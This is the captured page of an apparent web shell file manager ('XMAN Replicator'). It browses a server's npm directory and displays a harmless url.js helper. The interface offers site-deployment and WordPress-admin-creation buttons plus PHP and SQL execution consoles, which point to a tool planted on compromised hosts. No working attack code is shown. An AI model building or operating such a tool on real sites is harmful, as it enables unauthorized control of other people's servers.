🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
alt-nodejs24
/
root
/
usr
/
lib
/
node_modules
/
npm
/
node_modules.bundled
/
tuf-js
/
dist
/
utils
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-05-14 17:41
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-05-14 17:41
🔄
🗑️
🗑️📁
⬇️
🔒
tmpfile.js
1,141 B
-rw-r--r--
2026-04-24 15:56
✏️
🔄
🗑️
⬇️
🔒
url.js
433 B
-rw-r--r--
2026-04-24 15:56
✏️
🔄
🗑️
⬇️
🔒
View: url.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.join = join; const url_1 = require("url"); function join(base, path) { return new url_1.URL(ensureTrailingSlash(base) + removeLeadingSlash(path)).toString(); } function ensureTrailingSlash(path) { return path.endsWith('/') ? path : path + '/'; } function removeLeadingSlash(path) { return path.startsWith('/') ? path.slice(1) : path; }
PHP Console
Execute
SQL Console
Execute